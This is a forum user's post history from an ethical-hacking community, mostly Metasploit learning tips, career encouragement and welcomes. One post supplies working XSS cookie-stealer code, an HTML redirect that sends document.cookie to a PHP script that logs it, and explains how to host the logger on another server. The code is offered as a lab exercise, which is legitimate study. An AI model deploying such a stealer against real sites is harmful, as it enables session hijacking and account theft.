|
EH-Net
|
|
May 22, 2013, 04:09:44 AM
|
Show Posts
|
|
Pages: [1] 2 3
|
|
2
|
Resources / Tutorials / Re: ms03_026_dcom help please
|
on: May 28, 2012, 06:48:00 AM
|
|
+1 to what unicityd wrote.
@ZeroOne I agree with you on that. But as unicityd wrote ... it's not the point to have a working exploit with which you can hack a gazillion of machines, but to learn how Metasploit as a tool functions. And here I think for learning purposes it's totally fine to follow along an "old" exploit just to see what options there are, how to use them ...and so on... So, see it as a "walk before you can run" thing ;o).
One thought on "who on earth will be using XP with no SPs", though. Think about all the people who run a stolen/hacked copy of XP (or Vista or Win7) on their machines with update services disabled in panic of not getting caught ... I heared this can be quite common in Third World countries. I don't know any statistics to show this though... it was just a thought...so please don't get me on this ;o)...
But you are probably right, in times of vista, win7 an unpatched copy of XP might be rare... (at least I have no personal experience about that...)
@ cyber.spirit I think the patch was originally after SP1(or2) and then later added to the SPs... that's why we still see Win 2003 in target range in Metasploit (was that your question?!?)...not sure about this though...
I really like the videos on securitytube. I am quite a fan of the "visual learning approach"....since I can better remember things when someone has shown me how to do it.
Anyways, have fun with the video series!
|
|
|
|
|
3
|
Resources / Tutorials / Re: ms03_026_dcom help please
|
on: May 27, 2012, 01:07:42 PM
|
|
Hi cyber.spirit
I guess you go through Viveks Videos on Metasploit, right?!
As far as I know the RPC-dcom exploit has been patched in SP1 or 2 ...not 100% sure at the moment.
However, the exploit will definately work with an unpatched Win XP - so no SPs (I tested that). Also make sure to disable any (Windows-) firewall.
|
|
|
|
|
4
|
Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: php script is not getting session cookie...
|
on: April 14, 2012, 03:51:39 AM
|
|
Hi wlandymore,
ok this might sound odd - and it's just a thought ...so don't get me wrong, but do you start your html file in a "server-context" meaning is it in your htdocs or do you just open it on your harddrive?
Since if you do the second it won't work or at least you cannot read the cookies from localhost ...(Happend to me too...an alertbox on the page worked however php script could't read cookies...).
For "debuggin" try to throw both scripts in your htdocs ... and look if the php script gets the cookies...
Don't know if this helps, was just a thought....
Cheers, -gromic
|
|
|
|
|
5
|
Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: need a little help with a cookie grab script...
|
on: April 08, 2012, 06:41:27 AM
|
Hi wlandymore, hi ajohnson The following code (cookie_site.html and cookiestealer.php ) should work (Seems that you just missed a / before your stealer script redirect in your html page). I tested it via a xampp setup and it worked. Just throw both of the files into your XAMPP htdocs. file: cookie_site.html <html> <head> <script type="text/javascript"> document.cookie = "Test123";</script> </head> <body> This page is a test <script> alert(document.cookie)</script> <script> document.location = "/cookiestealer.php?cookie=" + document.cookie; </script> </body> </html>
file: cookiestealer.php <?php $cookie = $_GET['cookie']; $log = fopen("cookielog.txt", "a"); fwrite($log, $cookie ."\n"); fclose($log); ?>
Note: - So far, page and stealer.php run on the same server (I know...not intended). When you move your stealer.php to another server you have to adjust your path i.e. “http://<Server IP >/cookiestealer.php?cookie=” … and so on..
- One more tip: When debugging your scripts make sure you delete your browsers cache each time... very often I changed something but my browser (Chrome) showed me still the old results
 - cross domain issues should't be a problem since as far as I understood the idea was to place the "stealer script" on a site which is vuln to XSS and steal the cookies related to THIS site, right? If you want to read cookies of another domain you run into "same orgin" issues..
Hope this helps and works for you.
|
|
|
|
|
6
|
Resources / Career Central / Re: What now ??
|
on: March 05, 2012, 11:16:40 AM
|
Hi Jamie, I am really sorry to hear that with your job. I second what everybody has written so far. From your posts here on EH-net as well as your site you seem really passionate about ITsec…So DON’T give up! "Our greatest glory is not in never failing, but in rising up every time we fail.” (Ralph Waldo Emerson) Since I am still in my masters and job hunting for me won’t start before august, this is the only “real advice” I can give you: “DON’T give up, if IT-Sec is really your passion!!” If I were in your situation, though, I would first ask your employer for a talk to elaborate on the exact reasons why they have fired you. This might hurt, but will give you valuable information on what you can improve the next time. Second I would right away start to apply for new pentesting jobs. Don’t let the “feeling of being not good enough” let you down or discourage you and get right into the game again! And only if this won’t work out for whatever reasons “too less job experience”, “too young”….blah blah… try to get a job as admin or what else…to build a solid foundation (always with the goal to learn something new...so no "brain death" jobs). And never forget to focus on your goal or “dream job”! I wish you good luck and all the best!! And again: Don’t give up!
|
|
|
|
|
11
|
EH-Net / Greetings / Re: Hi, I'm New Here
|
on: January 23, 2012, 01:10:10 PM
|
|
Welcome blue_hat,
With programming languages it is always a matter of "the right tool for the right job". So as cd1zz mentioned it always depends on your goals.
Nevertheless I think it is always good to have various programming languages on your "tool belt" since very often they help looking at problems in different ways. Because when holding only the same hammer in your hand ...every problem somehow always looks like a nail... (and maybe not like a screw...)
Again Welcome to EH-Net!
|
|
|
|
|
12
|
EH-Net / Greetings / Re: Good day ...
|
on: January 23, 2012, 12:48:47 PM
|
|
Hi CeemGee and Welcome on EH-Network! Looking forward to read more from you in the future
|
|
|
|
|
13
|
Features / Opinions / Re: My website comments, feedback and more
|
on: January 23, 2012, 12:45:24 PM
|
Hi Jamie, Love your new design!! (have also been a visitor of your site when it had the old one) Wow, I am jealous , since setting up a page/blog is also on my toDo list for quite some time now (the domain is already set)... and your site is just what I had imagined  . Maybe a bit off topic but I found out that you have removed the Syngress XSS Attack book from your "future" reading list ( If I can remember it right). Any reasons for this? Since I bought it the other week and think it is quite an interesting read (read the first 100 pages so far). Reading it always makes me shiver of what's all possible with Xss... Anyways...getting back to the topic... Great page! Good luck with it!
|
|
|
|
|
Loading...
|